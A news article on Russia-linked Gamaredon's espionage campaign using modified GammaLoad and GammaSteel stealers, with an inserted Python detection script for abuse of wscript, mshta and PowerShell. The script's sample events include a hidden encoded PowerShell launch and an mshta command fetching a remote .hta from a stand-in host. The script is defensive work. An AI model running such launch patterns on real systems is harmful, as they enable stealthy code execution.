Russian Hackers Focused on Espionage, Not System Destruction
Russia-Linked Hackers Deploying Modified GammaLoad Info Stealer Malware
While malicious wipers have stolen most of the headlines in the Russia-Ukraine cyberwar, investigators say Russians are now using modified GammaLoad and GammaSteel info stealer malware to spy on compromised government employee accounts and avoid detection. The attack begins with a phishing email.
Unlike previous Russian-sponsored campaigns deployed to disrupt the Ukrainian information infrastructure, the new campaign focuses on espionage and uses two recently modified malware variants to avoid detection, says the State Cyber Protection Center of Ukraine.
Targets of the campaign include Ukrainian state authorities and critical information infrastructure entities, according to the State Cyber Defense Center.
Tracked by the center as UAC-0010, the advanced persistent threat group is also known as Gamaredon, Armageddon and Primitive Bear.
Ukraine has previously linked the hacker group to the Office of the FSB of Russia in the Republic of Crimea and the city of Sevastopol. Operational since 2014, the group consists of regular officers of the FSB and some former law enforcement officers of Ukraine, according to a technical report by the Security Service of Ukraine.
Gamaredon is traditionally known to write its malware in VBScript, VBA, C#, C++, PowerShell and .NET. Its malware targets the Windows, Linux and Android operating systems.
The threat group previously used several notable malware strains, including EvilGnome, Pterodo (also called Pteranodon) and PseudoSteel. In the first half of 2022, according to a report by the Computer Emergency Response Team of Ukraine, Gamaredon began deploying GammaLoad and GammaSteel info stealer malware via phishing emails sent from compromised government employee accounts.
"The purpose of the attackers, among other things, is to steal files with a specified list of extensions, as well as authentication data of internet browsers," CERT-UA said at the time.
The latest report, however, says that the threat group has redeveloped and modified these malware variants to support multistage download and deployment of malware payloads. This helps the malware analyzed in the latest campaigns stay undetected and maximizes the chance of maintaining persistence.
The phishing emails in the latest campaign are sent from domains associated with legitimate organizations, such as the Security Service of Ukraine, according to the report.
The emails contain malicious LNK files stored in RAR archives. Only users with Ukrainian IP addresses are able to open these files.
All analyzed GammaLoad variants are VBScript droppers that use Base64 encoding and text string replacement as obfuscation techniques. They are designed to abuse trusted, signed system utilities - such as WMI, mshta.exe, wscript.exe and powershell.exe - in order to maintain persistence and download the next-stage payloads.
Similarly, all analyzed GammaSteel samples are PowerShell scripts designed to identify valuable information on the victim's system and, if needed, perform additional operations such as sending screen captures along with system information to Gamaredon's command-and-control server.
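A defender-side check for the chaining of signed utilities described above, written as an added example and not taken from the report or the article: it runs a few constructed process-creation events (parent image, child image, command line) through rules that flag a script host spawning another script host or powershell.exe, mshta.exe launched with a remote URL, and PowerShell run with an encoded command, and it decodes that encoded argument so an analyst can read it. Representing WMI by its provider host process wmiprvse.exe is an assumption.

```python
import base64
import re

# Constructed process-creation events for this example: (parent image, child image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "wscript.exe", r"wscript.exe C:\Users\u\AppData\Local\Temp\doc.vbs"),
    ("wscript.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc RwBlAHQALQBEAGEAdABlAA=="),
    ("wmiprvse.exe", "mshta.exe", "mshta.exe http://example.invalid/update.hta"),
    ("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
    ("services.exe", "powershell.exe", "powershell.exe -File C:\\ops\\backup.ps1"),
]

# Signed utilities named in the report; WMI is represented by wmiprvse.exe (assumption).
LOLBINS = {"wscript.exe", "mshta.exe", "powershell.exe"}
SCRIPT_HOSTS = LOLBINS | {"wmiprvse.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (UTF-16LE script).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+(?P<b64>[A-Za-z0-9+/=]{20,})")

def classify(parent, child, cmdline):
    """Return the list of rules an event trips (empty list means it looks benign)."""
    parent, child = parent.lower(), child.lower()
    reasons = []
    if parent in SCRIPT_HOSTS and child in LOLBINS:
        reasons.append(f"{parent} spawned {child}")
    if child == "mshta.exe" and re.search(r"(?i)https?://", cmdline):
        reasons.append("mshta.exe launched with a remote URL")
    if child == "powershell.exe" and ENCODED_FLAG.search(cmdline):
        reasons.append("powershell.exe run with an encoded command")
    return reasons

def decode_encoded_command(cmdline):
    """Decode PowerShell's -EncodedCommand argument (Base64 of UTF-16LE), or return None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan(events):
    """Return [(event index, reasons)] for every event that trips at least one rule."""
    hits = []
    for i, (parent, child, cmdline) in enumerate(events):
        reasons = classify(parent, child, cmdline)
        if reasons:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i][1], reasons, decode_encoded_command(SAMPLE_EVENTS[i][2]))
```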
"Analyzing the actions performed on the infected host after gaining the opportunity to execute PowerShell commands, we can conclude that adversaries are focused more on espionage," the report says.